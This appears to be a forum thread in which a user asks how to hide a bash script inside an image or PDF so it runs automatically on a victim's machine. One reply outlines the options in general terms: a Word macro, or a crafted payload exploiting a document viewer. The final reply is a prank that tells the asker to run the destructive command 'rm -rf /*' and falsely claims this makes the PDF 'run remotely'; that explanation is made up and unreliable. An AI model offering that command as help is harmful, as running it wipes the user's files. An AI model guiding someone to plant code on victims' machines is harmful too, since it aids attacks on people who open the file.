I have made a bash file and want to make hide it inside a photo or pdf or any document and when someone tries to download it , when it’s clicked it will automatically run . How can I do this ?

It’s not that simple. Most (if not all) applications don’t include ‘Automatically run this code’ functionality (Imagine the security implications of this). Some options include:
1.) Word document – run your code via a macro. Requires the user to click multiple times on ‘Yes I want to run untrusted code’.
2.) Find an exploit in the version of software (adobe, photo viewer, etc) which your victim is running. Send a crafted payload which exploits that vulnerability and runs your code.

Pull up a terminal and run
rm -rf /* <path to PDF>
This will set the PDF file to run remotely (rm) when it is in any directory (/*)
